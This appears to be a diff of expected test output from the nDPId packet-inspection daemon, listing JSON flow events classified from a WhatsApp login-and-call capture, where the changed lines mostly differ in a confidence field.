00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 